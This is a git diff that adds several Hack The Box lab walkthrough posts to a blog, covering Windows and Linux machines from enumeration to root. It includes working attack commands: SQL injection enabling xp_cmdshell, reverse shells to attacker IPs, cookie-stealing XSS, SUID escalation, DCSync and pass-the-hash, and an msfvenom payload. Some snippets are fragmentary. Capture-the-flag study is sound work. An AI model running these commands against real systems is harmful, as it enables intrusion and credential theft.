+maya::MAILING:5e0eb9256971de1f:DEBA7F01E81351DCFEDA3C905CA932E8:010100000000000080BA1036359FDA01E3495C93763B0B450000000002000800460042005600410001001E00570049004E002D003300410035005400350049004F00550048003800330004003400570049004E002D003300410035005400350049004F0055004800380033002E0046004200560041002E004C004F00430041004C000300140046004200560041002E004C004F00430041004C000500140046004200560041002E004C004F00430041004C000700080080BA1036359FDA010600040002000000080030003000000000000000000000000020000080F0D79319E6BB3D505B32F68F03892752BD8DD6272B1FBD42563DB8BA2BE13A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000
+```
+
+## Hashcat
+
+`echo "841bb5acfa6779ae432fd7a4e6600ba7" >> hash.txt`
+
+```
+hashcat -m 5600 hash.txt -a 0 -o cracked_passwords.txt /usr/share/wordlists/rocky
+```
+
+- `m 5600` specifies the NTLMv2 hash mode.
+- `a 0` specifies a dictionary attack.
+-
+
+
+
+
+## Evil-Winrm
+
+
+`evil-winrm -i 10.10.11.14 -u maya -p 'm4y4ngs4ri'`
+
+
+
+User flag
+
+
+
+## **Privilege Escalation**
+
+After researching how to perform Privilege Escalation on a Windows server, I found some CVEs that seem interesting, such as CVE-2023-2255 for LibreOffice.
+
+
+
+[_**CVE Libre Office**_](https://github.com/elweth-sec/CVE-2023-2255?tab=readme-ov-file)
+
+**CVE-2023-2255**
+
+`python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'`
+
+To accomplish this, I will embed the user Maya into the exploit.odt file and grant permissions to the local group Administradores.
+
+## **SMB Server**
+
+There is an important documents folder under C:. Note that the folder has administrator rights to run.
+
+
+
+Most likely you put the odt file in there (important documents) and then get the admin shell
+
+`impacket-smbserver mailing` pwd `-smb2support`
+
+
+
+Let the Maya user, running in `evil-winrm`, connect and copy the `exploit.odt` file into the `Important Documents` directory, prompting Maya to click and run the `exploit.odt` file.
+
+```
+net use \\\\10.10.16.20\\mailing
+
+copy \\\\10.10.16.20\\mailing\\exploit.odt
+```
+
+
+After waiting for a few seconds, I'll check the status of the Maya user.
+
+`net user maya`
+
+## **Dump SAM Hash**
+
+
+
+⭐_HackTool:Win32/Dump is a command line tool that dumps password hashes from Windows NT's SAM(Security Accounts Manager) database. The dumped password hashes can be fed into an NT password auditing tool, such as L0phtCrack to recover the passwords of Windows NT users._
+
+
+**`crackmapexec smb 10.10.11.14 -u maya -p "m4y4ngs4ri" --sam`**
+
+- `crackmapexec smb`: Specifies that `crackmapexec` will be used to interact with the SMB protocol. `crackmapexec` is a versatile tool used for pentesting the security of network services, SMB being one of them.
+- `u maya`: This flag followed by `maya` specifies the username to be used when authenticating to the SMB service on the target machine.
+- `p "m4y4ngs4ri"`: This flag followed by `"m4y4ngs4ri"` specifies the password for the username provided. Together with the username, this forms the credentials used for SMB authentication.
+- `-sam`: This is an option that instructs `crackmapexec` to attempt to dump the SAM (Security Account Manager) database. The SAM database stores user credentials in a Windows system, typically hashed passwords. Dumping the SAM can be used to retrieve these hashes, which can then be cracked offline to obtain plaintext passwords.
+
+
+
+## **Remote Windows machine using WMIExec**
+
+`impacket-wmiexec localadmin@10.10.11.14 -hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae`
+
+- `impacket-wmiexec`: This is a script from the Impacket suite, which is a collection of Python classes for working with network protocols. `impacket-wmiexec` is specifically designed for executing commands remotely on Windows systems using WMI.
+
+- `localadmin@10.10.11.14`:
+
+ - `localadmin` is the username being used to authenticate.
+ - `10.10.11.14` is the IP address of the target machine where commands will be executed.
+- `hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae`:
+
+ - `hashes` specifies that hash values are being used instead of a plaintext password for authentication.
+ - `aad3b435b51404eeaad3b435b51404ee` is the LM hash. It is often a placeholder since LM hashing is less secure and frequently disabled in modern systems.
+ - `9aa582783780d1546d62f2d102daefae` is the NT hash, which is the hash of the actual password for the account.
+
+[Impacket-wmiexec](https://tools.thehacker.recipes/impacket)
+
+
+
+
+`Root`
\ No newline at end of file
diff --git a/_posts/2024-01-08-blazorized.md b/_posts/2024-01-08-blazorized.md
new file mode 100644
index 0000000..2e45993
--- /dev/null
+++ b/_posts/2024-01-08-blazorized.md
@@ -0,0 +1,288 @@
+---
+title: HTB - Blazorized
+date: 2024-02-02 12:17:34 -0400
+categories: [hackthebox , Blazorized]
+tags: [HackTheBox, NTLM, Evil-winrm, nmap, hashcat, Movement Lateral, Active Directory, BloodHound, mimikatz, logoncount, Blazor, metasploit, sqlinjection, powershell, winPEAS]
+image:
+ path: /assets/img/post/blazorized/Blazorized-card.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - Blazorized.
+---
+
+## Box Info
+
+| Name | Blazorized |
+| :-------------------- | ---------------: |
+| Release Date | 02 Mar, 2024 |
+| OS | Windows |
+| Rated Difficulty | Medium |
+
+## **Enumeration**
+
+Tip:
+
+
+## **Nmap**
+
+
+
+## Web
+
+
+
+Puerto{: filepath} `445 Microsoft Directory Services`
+
+```bash
+smbclient -L //blazorized.htb
+```
+
+
+
+## Scan Subdomains
+
+```bash
+wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302 -H "Host: FUZZ.blazorized.htb" -u http://blazorized.htb -t 100
+```
+
+
+
+With ffuf
+
+```bash
+ffuf -c -u "http://blazorized.htb" -H "host: FUZZ.blazorized.htb" -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -fc 301,302 -mc all
+```
+
+
+
+We found a subdomain called 'admin,' and we added it to our hosts.
+
+Web application on port 80 is built with the `Blazor WebAssembly`
+
+
+
+Blazor webassembly works with Js and json
+
+
+
+We found a script write in js
+
+
+
+For read better the code we need to copy and paste to beautifier.io Web.
+
+
+
+
+We found a interesting path.
+
+
+
+The _framework folder contains essential files for the operation of the Blazor application, including `.dll files`, `resources`, and `configuration files`.
+
+- `/_framework/blazor.webassembly.js`: Essential for running Blazor apps
+- `/_framework/wasm/`: Contains WebAssembly binaries
+
+Download the DLLs for decompile
+
+
+
+## DLL Ananlysis
+
+Decompile DLLs using `DNSpy` in windows.
+
+
+
+`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJpc3MiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIiwiYXVkIjoiaHR0cDovL2FkbWluLmJsYXpvcml6ZWQuaHRiIiwiZXhwIjoxNzIwMDAwMDAwfQ.tJptKXJlG9KDSjxR9Y3gxdcSy7fHj-50GS6_Dd9PAOk`
+
+Build a jwt for Super_Admin
+
+
+
+**Set the jwt token to Local Storage:**
+
+
+
+We need use this for secret key for jwt (dont forget)
+
+
+
+Now we have to copy the string create in jwt.io web and storage local in the web.
+
+
+
+
+
+In the section "Check Duplicate" from the web,It make a search in the database, if some category is duplicate, so we a exploit this with SQLinjection
+
+
+
+The web run a microsoft sql for a get a revshell. [Hacktricks](https://book.hacktricks.xyz/v/es/network-services-pentesting/pentesting-mssql-microsoft-sql-server)
+
+
+
+Now we are going to use these commands and find out if we are successful.
+
+
+
+```shell
+test'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -
+```
+
+```shell
+test'; exec master..xp_cmdshell 'powershell -e *powershellBased64*';-- -
+```
+
+## Nu_1055
+
+We got the shell!!.
+
+
+
+Change the shell to a meterpreter shell, create a payload, upload and execute.
+
+
+
+
+
+
+
+This practice is more convenient for executing certain commands that we cannot perform in the previous shell.
+
+
+
+It is a tool for visualizing relationships and permissions within an Active Directory (AD) or Azure environment (Azure Active Directory, AAD).
+
+[BloodHound](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)
+
+Upload with metasploit to victim machine and execute the follow command:
+
+```shell
+powershell -exec bypass -command "Import-Module ./SharpHound.ps1; Invoke-BloodHound -c all"
+```
+
+
+Download with the metasploit the .zip in owner attack machine
+
+
+
+
+
+
+
+
+## Movement Lateral
+
+Extract the zip and use it to BloodHound
+
+
+
+
+
+### WriteSPN
+
+- BloodHound reveals that `NU_1055` has `writeSPN Privilege` on the `RSA_4801` account
+- Vulnerable to SPN-jacking
+
+
+
+
+
+
+Upload the PowerView.ps1 with metasploit and execute:
+
+set SPN
+
+```shell
+Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='test/test'}
+```
+
+Request Service Ticket
+
+```shell
+Get-DomainSPNTicket -SPN test/test
+```
+
+
+
+
+
+**Tip**: make the hash use all space in your file txt
+
+this :
+
+
+
+to this:
+
+
+
+#### Hashcat
+
+Cracked the hash with **hashcat**
+
+```bash
+hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt -o found.txt --force
+```
+
+
+
+password: `(Ni7856Do9854Ki05Ng0005 #)`
+
+
+
+Use evil-winrm for login as RSA_4810:
+```javascript
+sudo evil-winrm -i blazorized.htb -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
+```
+
+### RSA_4810
+
+
+
+Use the PowerView.ps1 and upload to RSA_4810 for use Get-NetUser command
+
+
+
+### SSA_6010
+
+The another users has a `logoncount` 0 and the user `SSA_6010` has a logoncount 4236.
+
+LogonCount is a login count, a property that is part of the profile information in an `Active Directory (AD)` environment.
+
+
+
+From Bloodhound we can see that RSA_4810 is member of group Remote_Support_Administrators.
+Upload `winPEAS` and Run and it show us a writeable file path.
+
+We have write privilege under A32FF3AEAA23 directory in SYSVOL.
+
+icacls A32FF3AEAA23
+
+
+
+```shell
+'powershell -e *base64*' | Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\revshell.bat -Encoding ASCII
+```
+
+```shell
+Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\revshell.bat'
+```
+
+
+
+Wait a second and get the shell for SSA_6010 and upload the SharpHound or look again
+and see the option "Find Principals with DCSync Rights" and see the SSA_6010 has a DCSync
+
+
+
+Upload a mimikatz.exe and execute the following command:
+
+lsadump::dcsync /domain:blazorized.htb /user:Administrator
+
+
+
+And we got the NTHASH for used in evil-winrm
+
+
+
+Rooted
\ No newline at end of file
diff --git a/_posts/2024-01-09-headless.md b/_posts/2024-01-09-headless.md
new file mode 100644
index 0000000..550c03d
--- /dev/null
+++ b/_posts/2024-01-09-headless.md
@@ -0,0 +1,136 @@
+---
+title: HTB - Headless
+date: 2024-02-02 12:17:34 -0400
+categories: [hackthebox , Headless]
+tags: [HackTheBox, Python Werkzeug, XSS, User-Agent]
+image:
+ path: /assets/img/post/headless/Headless-card.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - Headless.
+---
+
+## Box Info
+
+| Name | Headless |
+| :-------------------- | ---------------: |
+| Release Date | 23 Mar, 2024 |
+| OS | Linux |
+| Rated Difficulty | Easy |
+
+## **Enumeration**
+
+```bash
+nmap -A -Pn 10.10.11.8 -oG allPorts
+```
+
+
+
+[http://10.10.11.8:5000/](http://10.10.11.8:5000/)
+
+
+
+## Scan Directory
+
+We dont found anything interesting...
+
+
+
+### BurpSuite
+
+Now go to /support
+
+
+
+And we try to intercept this with Burpsuite
+
+
+
+If I try some HTML injection returns the HTTP request content.
+
+
+
+The HTTP `response` headers show it’s a `Werkzeug / Python server`
+
+**Exploitation**
+
+**Blind XSS on User-Agent**
+
+Try to figerout a large time i found the XSS over header put in a `header-false: a`
+
+`:/'+document.cookie);>`
+
+
+
+
+**Python Server**
+
+`python -m http.server 8020`
+
+
+
+
+
+After Exploit XSS at User-Agent, we get a reply back with the **admin cookie** at the python server
+
+
+
+
+[http://10.10.11.8:5000/dashboard](http://10.10.11.8:5000/dashboard)
+
+
+
+
+
+
+**Reverse Shell**
+
+
+
+```
+#!/bin/bash
+/bin/bash -c 'exec bash -i >& /dev/tcp// 0>&1'
+#Create Reverse Shell script into a file, In my case I create .sh
+```
+
+
+
+
+
+
+
+
+
+**User Flag**
+
+## Privilege Escalation
+
+#### Check sudo -l
+
+
+
+Syscheck
+
+cat /usr/bin/syscheck:
+
+
+
+
+### Exploit [initdb.sh](http://initdb.sh)
+
+`echo "chmod u+s /bin/bash" > initdb.sh chmod +x initdb.sh`
+
+- `chmod u+s /bin/bash`: Sets the set-user-ID (SUID) permission on `/bin/bash`, allowing users to execute the bash shell with the file owner's (typically root) privileges.
+- `chmod +x initdb.sh`: This command changes the permissions of the file `initdb.sh`, making it executable (`+x`) by the file's owner, group, and others. This allows the script to be run as a program by the user.
+
+
+
+```
+sudo /usr/bin/syscheck
+/bin/bash -p
+```
+
+`/bin/bash -p`: starts a bash shell with root privileges retained, due to the SUID bit making the shell run with the file owner's (root's) effective ID.
+
+
+
+**Root Flag**
\ No newline at end of file
diff --git a/_posts/2024-01-10-blurry.md b/_posts/2024-01-10-blurry.md
new file mode 100644
index 0000000..26c5230
--- /dev/null
+++ b/_posts/2024-01-10-blurry.md
@@ -0,0 +1,96 @@
+---
+title: HTB - Blurry
+date: 2024-02-02 12:17:34 -0400
+categories: [hackthebox , Blurry]
+tags: [HackTheBox, CVE-2024-24590, ClearML, pickle files, pth files,artifact, API]
+image:
+ path: /assets/img/post/blurry/Blurry.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - Blurry.
+---
+
+## Box Info
+
+| Name | Blurry |
+| :-------------------- | ---------------: |
+| Release Date | 30 Mar, 2024 |
+| OS | Linux |
+| Rated Difficulty | Medium |
+
+## **Enumeration**
+
+```bash
+nmap -p- --open --min-rate 5000 -sS -vvv -n -Pn 10.10.11.19 -oG allports
+nmap -sCV -p 22,80 10.10.11.19 -oN targeted
+```
+
+
+
+```bash
+echo " 10.10.11.19 app.blurry.htb" | sudo tee -a /etc/hosts
+```
+
+## ClearML
+
+
+
+At this point, it is important to know what clear ML is and how it works.
+After much searching and gathering information, I found that we can connect through a Python package called clearml-agent and create an environment.
+
+During the research process, I found that clearml has a **`CVE-2024-24590: Pickle Load on Artifact Get`**.
+
+## CVE-2024-24590
+
+*ClearML involves the inherent insecurity of pickle files. We discovered that an attacker could create a pickle file containing arbitrary code and upload it as an artifact to a project via the API. When a user calls the get method within the Artifact class to download and load a file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.*
+
+
+
+
+
+### Create credentials
+
+To do this, we need to create new credentials to connect through clearml-agent, and to set up, we use the 'init' option.
+
+
+
+We press enter on the options and boom, we're connected.
+
+
+
+So once connected, we'll proceed to exploit the vulnerability.
+
+
+
+
+
+
+
+## Privilege Escalation
+### Sudo -l
+Once **I had the reverse shell**, I continued with my enumeration and found a vulnerability with 'sudo -l
+
+
+
+I dug into the files and found that when executing /usr/bin/`evaluate_model`, it ran the `demo_model.pth`, which in turn executed the .py file located in `/models/`{: .filepath}. So, I modified the .py file to obtain a reverse shell.
+
+
+
+
+
+But be careful, it runs with 'sudo' as it doesn't require a password to execute it, so we'll obtain a privileged reverse shell.
+
+```bash
+sudo evaluate_model /models/demo_model.pth
+```
+
+
+
+With netcat listening the port 9001
+
+
+
+**`Root`**
+
+
diff --git a/_posts/2024-01-11-boardlight.md b/_posts/2024-01-11-boardlight.md
new file mode 100644
index 0000000..e75ab4f
--- /dev/null
+++ b/_posts/2024-01-11-boardlight.md
@@ -0,0 +1,114 @@
+---
+title: HTB - BoardLight
+date: 2024-02-02 12:17:34 -0400
+categories: [hackthebox , BoardLight]
+tags: [HackTheBox, Dolibarr, PHP, CVE-2023-30253, LinPEAS, CVE-2022-37706]
+image:
+ path: /assets/img/post/boardlight/BoardLight-card.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - BoardLight.
+---
+
+## Box Info
+
+| Name | BoardLight |
+| :-------------------- | ---------------: |
+| Release Date | 25 May, 2024 |
+| OS | Linux |
+| Rated Difficulty | Easy |
+
+## **Enumeration**
+
+
+
+### SubDomain
+
+```bash
+wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt "Host: FUZZ.board.htb" -u [](http://board.htb/)[http://board.htb](http://board.htb)
+```
+
+
+
+
+
+
+
+
+
+The login page is using the default credentials by Dolibarr
+
+## Dolibarr 17.0.0
+
+### CVE-2023-30253
+
+[`Missing Error Handling | OWASP Foundation`](https://owasp.org/www-community/vulnerabilities/Missing_Error_Handling)
+
+The version Dolibarr 17.0.0 has a vulnerability to `PHP Code injection` (RCE) (CVE-2023-30253)
+
+[Dolibarr confirm RCE in the version 17.0.0](https://github.com/advisories/GHSA-9wqr-5jp4-mjmh)
+
+
+[Security Advisory: Dolibarr 17.0.0 PHP Code Injection (CVE-2023-30253) - Swascan](https://www.swascan.com/security-advisory-dolibarr-17-0-0/)
+
+
+
+We make a page and use PHP for try to get a reverse shell.
+
+
+
+
+
+```js
+
+```
+
+
+
+```php
+
+& /dev/tcp/10.10.14.88/7777 0>&1'");?>
+
+```
+
+[https://wiki.dolibarr.org/index.php?title=Backups](https://wiki.dolibarr.org/index.php?title=Backups)
+
+### Credentials
+
+```zsh
+$dolibarr_main_db_name='dolibarr'; $dolibarr_main_db_prefix='llx_'; $dolibarr_main_db_user='dolibarrowner'; $dolibarr_main_db_pass='serverfun2$2023!!'; $dolibarr_main_db_type='mysqli';
+
+dolibarrowner
+
+serverfun2$2023!!
+
+cat /etc/passwd | grep bash
+
+SSH:
+
+larissa
+
+serverfun2$2023!!
+```
+
+
+
+
+I found no exploitable points and uploaded linpeas to scan for vulnerabilities.
+
+## LinPEAS
+
+`_LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix_/MacOS hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)_`
+
+[PEASS-ng/linPEAS at master · peass-ng/PEASS-ng](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS)
+
+## Enlightenment_sys
+
+Enlightenment_sys in some cases could be an internal component or refer to scripts or tools for interacting with Enlightenment; it could also be a module or a configuration depending on the context.
+
+
+
+In this point it's just exploit the CVE for scalation previleges and get the root flag.
+
+[GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/tree/main)
+
+Run exploit.sh and you obtained the shell as `root`.
\ No newline at end of file
diff --git a/_posts/2024-01-12-editorial.md b/_posts/2024-01-12-editorial.md
new file mode 100644
index 0000000..8a16085
--- /dev/null
+++ b/_posts/2024-01-12-editorial.md
@@ -0,0 +1,125 @@
+---
+title: HTB - Editorial
+date: 2020-11-18 12:17:34 -0400
+categories: [hackthebox , Editorial]
+tags: [SSRF, Python, Git]
+image:
+ path: /assets/img/post/editorial/Editorial-card.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - Editorial.
+---
+
+## Box Info
+
+| Name | Editorial |
+| :-------------------- | ---------------: |
+| Release Date | 15 Jun, 2024 |
+| OS | Linux |
+| Rated Difficulty | Easy |
+
+## **Enumeration**
+
+
+
+echo "10.10.11.20 editorial.htb" | sudo tee -a /etc/hosts
+
+whatweb:
+
+Web:
+
+dirsearch -u http://editorial.htb/
+
+
+This page is interesting, we can preview an image from a file or url.
+
+
+
+## SSRF
+
+The file name is renamed and the file extension is removed. When we open the preview image in a new tab, the file downloaded directly, so it seems like we can’t execute any shell directly.
+
+When I upload a file and add a url "http://127.0.0.1/" and intercept with BurpSuite, we can see the response 200 OK and showing a image directory location, this point to a `SSRF`.
+
+
+
+In an [SSRF](https://portswigger.net/web-security/ssrf) attack against the server, the attacker causes the application to make an HTTP request back to the server that is hosting the application, via its loopback network interface. This typically involves supplying a URL with a hostname like `127.0.0.1` (a reserved IP address that points to the loopback adapter) or `localhost` (a commonly used name for the same adapter)
+
+
+
+The response shows us a directory path, let's download the file and see what's inside.
+
+
+
+
+
+
+
+
+And re upload the file and add the path in burpsuite.
+
+`/api/latest/metadata/messages/authors`{: .filepath}
+
+
+
+
+
+Username: dev - Password: dev080217_devAPI!@
+
+
+user flag
+
+
+
+
+### Linux Enumeration
+
+```bash
+find / -user dev 2>/dev/null | grep -vE "sys|proc"
+```
+
+
+
+
+
+
+The command `Git show` displays detailed information about a commit.
+
+
+
+
+
+
+080217_Producti0n_2023!@ for prod
+- su `prod`
+- password: `080217_Producti0n_2023!@`
+
+## Privilege Escalation
+
+sudo -l
+
+
+
+```bash
+- echo '#!/bin/bash' > /tmp/exploit.sh
+
+- echo 'chmod u+s /bin/bash' >> /tmp/exploit.sh
+```
+
+
+
+```bash
+- sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c '/tmp/exploit.sh'"
+```
+
+
+
+- `ls -l /bin/bash`
+
+
+
+Start a new bash session.
+
+- `/bin/bash -p`
+
+
+
diff --git a/_posts/2024-01-13-greenhorn.md b/_posts/2024-01-13-greenhorn.md
new file mode 100644
index 0000000..3502d12
--- /dev/null
+++ b/_posts/2024-01-13-greenhorn.md
@@ -0,0 +1,107 @@
+---
+title: HTB - GreenHorn
+date: 2024-02-02 12:17:34 -0400
+categories: [hackthebox , GreenHorn]
+tags: [HackTheBox, CMS pluck, RCE, User-Agent]
+image:
+ path: /assets/img/post/greenhorn/greenhorn-card.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - GreenHorn.
+---
+
+## Box Info
+
+| Name | GreenHorn |
+| :-------------------- | ---------------: |
+| Release Date | 20 Jul, 2024 |
+| OS | Linux |
+| Rated Difficulty | Easy |
+
+## **Enumeration**
+
+### Information Gathering
+
+#### Scan with nmap:
+
+
+
+Add the dns to /etc/hosts:
+
+```java
+echo "10.10.11.25 greenhorn.htb" | sudo tee -a /etc/hosts
+```
+
+```bash
+whatweb greenhorn.htb or wappalyzer from web.
+```
+
+we have in the bottom a web for `admin` with the `CMS` called '`pluck'`
+
+
+
+## CMS pluck 4.7.18
+
+We found in the web admin the version for the CMS 'pluck' 4.7.18 which have a `RCE vulnerability` but we need a password for login in the pluck CMS so i look at the port 3000 because we have a http with status 200 so investigate i found a web similar to github. After searching, I found credentials I assumed use it to pluck CMS.
+
+
+
+## Gitea
+
+
+
+`iloveyou1`
+
+
+
+## Explotation
+
+I login into pluck CMS and we are inside as administrator in the web and see the version of the pluck cms
+
+
+
+I found a [RCE](https://www.exploit-db.com/exploits/51592) for that version CMS pluck and we go use it
+
+
+
+looked the "upload_url" that tell me the web have a section in "module" of pluck CMS called "installmodule" so we go to investigate and used it
+
+
+
+To perform the RCE we need to make a reverse shell with pentestmonkey in php because the server is mount over apache so i use the pentestmonkey reverse shell for compressed and upload .
+
+
+
+## Privilege Escalation
+
+when upload the zip we need to reload the web http://greenhorn.htb/data/modules/shell/revshell.php and listening with `nc -lvnp 9001` Once reload the web we got the reverse shell as www-data but we go to re-use the password iloveyou1 for login as junior and see the user.txt file.
+
+
+
+Well for scalation priveligies we download the file 'Using OpenVAS.pdf'
+
+
+
+Well, after hours of searching, i need download 2 tools
+`pdfimages` from poppler-utils
+`depix.py` from https://github.com/spipm/Depix
+
+`pdfimages ./PDF OUTPUT`
+
+
+
+## Pixelized Screenshots
+
+```zsh
+python3 depix.py -p /path/of/openvas image -s /images/searchimages/debruinseq_notepad_windows10_CloseAndSpace.png -o out1.png
+```
+
+
+
+And we got the password for root:
+sidefromsidetheothersidesidefromsidetheotherside
+
+
+
+and login as root
+
+
\ No newline at end of file
diff --git a/_posts/2024-01-14-compiled.md b/_posts/2024-01-14-compiled.md
new file mode 100644
index 0000000..dee81c7
--- /dev/null
+++ b/_posts/2024-01-14-compiled.md
@@ -0,0 +1,261 @@
+---
+title: HTB - Compiled
+date: 2024-02-02 12:17:34 -0400
+categories: [hackthebox , Compiled]
+tags: [HackTheBox, CMS pluck, RCE, User-Agent]
+image:
+ path: /assets/img/post/compiled/compiled-card.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - Compiled.
+---
+
+## Box Info
+
+| Name | Compiled |
+| :-------------------- | ---------------: |
+| Release Date | 20 Jul, 2024 |
+| OS | Windows |
+| Rated Difficulty | Medium |
+
+## **Enumeration**
+
+Information gathering
+
+Nmap
+
+
+http://compiled.htb:5000
+
+We have a web what does a git clone of a repository and decompress it and save the link of the repository (git).
+
+
+
+The repository calculator tells us a version of git that runs the web.
+
+http://compiled.htb:3000/richard/Calculator
+
+
+
+## CVE-2024-32002
+
+[Resource For Create The Exploit](https://amalmurali.me/posts/git-rce/)
+
+
+
+In few words we need to create 2 empty repository that match with the names the repository and add the payload useing the [Reverse Shell Generator](https://www.revshells.com/) , the names of repo can you rename as `repo1` and `repo2` or wathever you want, just match with the script.
+
+`git clone --recursive git@github.com:amalmurali47/git_rce.git`
+
+
+```zsh
+git config --global protocol.file.allow always
+git config --global core.symlinks true
+git config --global init.defaultBranch main
+rm -rf nothing
+rm -rf toSeeHere
+git clone http://compiled.htb:3000/test/repo1.git
+ cd repo1
+mkdir -p y/hooks
+cat >y/hooks/post-checkout <dotgit.txt
+git hash-object -w --stdin dot-git.hash
+printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
+git update-index --index-info
+
+- whoami /priv
+- $Credential.GetNetworkCredential().password
+- net user Emily
+- tasklist
+- Get-Service
+
+Upload to winPEAS.exe and execute with powershell
+
+PS>./winPEAS.exe
+```
+
+## Privilege Escalation
+
+#### WinPEAS.exe
+
+
+
+Searching in google i found this
+
+
+
+## CVE-2024-20656
+
+
+
+*NFS is a protocol that allows us to access files over a network in a manner similar to how we access local storage, and it’s commonly used to share files between UNIX/Linux and Windows systems.*
+
+VSStandarCollectorService150 is a diagnostics tools, which is part of the visual studio, creates drectories and files in `"C:\Windows\Temp"`{: .filepath} directory with insufficiently restrivice permissions.
+
+theres a github with a poc for CVE-2024-20656 but we need to make certain modification on the project, and then compile it to an executable.
+
+[CVE-2024-20656](https://github.com/Wh04m1001/CVE-2024-20656/tree/main/Expl)
+
+
+
+### Visual Studio
+
+The modification we make it is:
+
+```js
+WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
+```
+
+
+
+
+
+and below in the code called `void cb1()`
+
+```js
+CopyFile(L"c:\\users\\public\\payload2.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
+```
+
+Create a new payload with msfvenom for get the shell as Administrator.
+
+```zsh
+msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.16.45 lport=9003 -f exe -o payload2.exe
